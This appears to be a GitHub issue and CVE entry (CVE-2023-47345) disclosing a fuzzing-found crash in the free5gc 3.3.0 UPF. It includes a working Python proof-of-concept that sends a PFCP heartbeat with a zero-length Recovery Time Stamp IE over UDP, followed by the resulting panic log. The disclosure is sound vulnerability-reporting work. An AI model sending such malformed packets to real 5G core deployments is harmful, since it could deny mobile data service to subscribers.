Headline
CVE-2023-47345: [Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero · Issue #483 · free5gc/free5gc
Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.
[Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero
Describe the bug
While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Recovery Time Stamp IE length is mutated to zero. This could cause DOS of any UPF instance, all memory issues due to this kind of PFCP messages are caught by the GO memory runtime, which would casue a panic and crash.
To Reproduce
Steps to reproduce the behavior:
- Build the UPF with source code
- Run the bin/upf with default config/upfcfg.yaml
- Run the following POC python script
#!/usr/bin/env python3
import socket
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udp_socket.settimeout(1.0)
pfcp_association_setup_request = b’\x20\x05\x00\x1f\x00\x00\x01\x00\x00\x3c\x00\x05\x00\x0a\x64\xc8\x64\x00\x60\x00\x04\xe8\x1f\xdc\x30\x00\x2b\x00\x06\x21\x00\x00\x00\x00\x00’
“"” PFCP Heartbeat Request with a Recovery Time Stamp IE whose length is mutated to zero “"” pfcp_heartbeat_request = b’\x20\x01\x00\x0c\x00\x00\x02\x00\x00\x60\x00\x00\xe8\x1f\xe7\xb4’
udp_socket.sendto(pfcp_association_setup_request, ('127.0.0.8’, 8805)) try: udp_socket.recv(65535) except Exception as exception: print(f"Receive failed: {exception}")
udp_socket.sendto(pfcp_heartbeat_request, ('127.0.0.8’, 8805)) try: udp_socket.recv(65535) except Exception as exception: print(f"Receive failed: {exception}")
udp_socket.close()
Expected behavior
Any people could leverage this to cause DOS and resource consumption against a pool of UPF. As much as possible, check the IE length of PFCP messages, update handling logic or just drop them to avoid frequent crashes. This will greatly improve the availability, stability, and security of free5gc UPF.
Screenshots
No special screenshot is provided.
Environment (please complete the following information):
- free5GC Version: v3.3.0
- OS: Ubuntu 20.04
- Kernel version: 5.4.5-050405-generic
- go version: go1.21.1 linux/amd64
Trace File****Configuration File
No specific configuration is required.
PCAP File
No specific pcap file is provided.
Log File
time="2023-09-22T03:24:35.891194467+08:00" level="info" msg="UPF version: \n\tNot specify ldflags (which link version) during go build\n\tgo version: go1.21.1 linux/amd64" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.904235696+08:00" level="info" msg="Read config from [upfcfg.yaml]" CAT="CFG" NF="UPF" time="2023-09-22T03:24:35.904663072+08:00" level="info" msg="==================================================" CAT="CFG" NF="UPF" time="2023-09-22T03:24:35.904772210+08:00" level="info" msg="(*factory.Config)(0xc0000147d0)({\n\tVersion: (string) (len=5) \"1.0.3\",\n\tDescription: (string) (len=31) \"UPF initial local configuration\",\n\tPfcp: (*factory.Pfcp)(0xc00006f170)({\n\t\tAddr: (string) (len=9) \"127.0.0.8\",\n\t\tNodeID: (string) (len=9) \"127.0.0.8\",\n\t\tRetransTimeout: (time.Duration) 1s,\n\t\tMaxRetrans: (uint8) 3\n\t}),\n\tGtpu: (*factory.Gtpu)(0xc00006f320)({\n\t\tForwarder: (string) (len=5) \"gtp5g\",\n\t\tIfList: ([]factory.IfInfo) (len=1 cap=1) {\n\t\t\t(factory.IfInfo) {\n\t\t\t\tAddr: (string) (len=9) \"127.0.0.8\",\n\t\t\t\tType: (string) (len=2) \"N3\",\n\t\t\t\tName: (string) \"\",\n\t\t\t\tIfName: (string) \"\",\n\t\t\t\tMTU: (uint32) 0\n\t\t\t}\n\t\t}\n\t}),\n\tDnnList: ([]factory.DnnList) (len=1 cap=1) {\n\t\t(factory.DnnList) {\n\t\t\tDnn: (string) (len=8) \"internet\",\n\t\t\tCidr: (string) (len=12) \"10.60.0.0/24\",\n\t\t\tNatIfName: (string) \"\"\n\t\t}\n\t},\n\tLogger: (*factory.Logger)(0xc000022e40)({\n\t\tEnable: (bool) true,\n\t\tLevel: (string) (len=4) \"info\",\n\t\tReportCaller: (bool) false\n\t})\n})\n" CAT="CFG" NF="UPF" time="2023-09-22T03:24:35.905047979+08:00" level="info" msg="==================================================" CAT="CFG" NF="UPF" time="2023-09-22T03:24:35.905060906+08:00" level="info" msg="Log level is set to [info]" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.905071569+08:00" level="info" msg="Report Caller is set to [false]" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.905097803+08:00" level="info" msg="starting Gtpu Forwarder [gtp5g]" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.905106855+08:00" level="info" msg="GTP Address: \"127.0.0.8:2152\"" CAT="Main" NF="UPF" time="2023-09-22T03:24:35.955858915+08:00" level="info" msg="buff netlink server started" CAT="BUFF" NF="UPF" time="2023-09-22T03:24:35.956003408+08:00" level="info" msg="perio server started" CAT="Perio" NF="UPF" time="2023-09-22T03:24:35.956021132+08:00" level="info" msg="Forwarder started" CAT="Gtp5g" NF="UPF" time="2023-09-22T03:24:35.965098244+08:00" level="info" msg="starting pfcp server" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:24:35.965152469+08:00" level="info" msg="pfcp server started" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:24:35.965258101+08:00" level="info" msg="UPF started" CAT="Main" NF="UPF" time="2023-09-22T03:24:52.058728637+08:00" level="info" msg="handleAssociationSetupRequest" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:24:52.058889668+08:00" level="info" msg="New node" CAT="PFCP" CPNodeID="10.100.200.100" LAddr="127.0.0.8:8805" NF="UPF" time="2023-09-22T03:24:52.058307700+08:00" level="fatal" msg="panic: runtime error: slice bounds out of range [6:4]\ngoroutine 6 [running]:\nruntime/debug.Stack()\n\t/snap/go/10339/src/runtime/debug/stack.go:24 +0x5e\ngithub.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main.func1()\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:86 +0x4a\npanic({0x84f480?, 0xc0001c4318?})\n\t/snap/go/10339/src/runtime/panic.go:914 +0x21f\ngithub.com/wmnsk/go-pfcp/ie.ParseMultiIEs({0xc00028f578?, 0xc00028f570?, 0x7f0972c4e640?})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/[email protected]/ie/ie.go:637 +0x185\ngithub.com/wmnsk/go-pfcp/message.(*HeartbeatRequest).UnmarshalBinary(0xc0002935c0, {0xc00028f570, 0x10, 0x10})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/[email protected]/message/heartbeat-request.go:101 +0xb3\ngithub.com/wmnsk/go-pfcp/message.Parse({0xc00028f570, 0x10, 0x10})\n\t/home/lee/go/pkg/mod/github.com/wmnsk/[email protected]/message/message.go:117 +0x325\ngithub.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).main(0xc0005ba0d0, 0xc00007a9d0)\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:125 +0x48b\ncreated by github.com/free5gc/go-upf/internal/pfcp.(*PfcpServer).Start in goroutine 1\n\t/home/lee/Desktop/free5gc/NFs/upf/internal/pfcp/pfcp.go:222 +0xb8\n" CAT="PFCP" LAddr="127.0.0.8:8805" NF="UPF"
Related news
Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.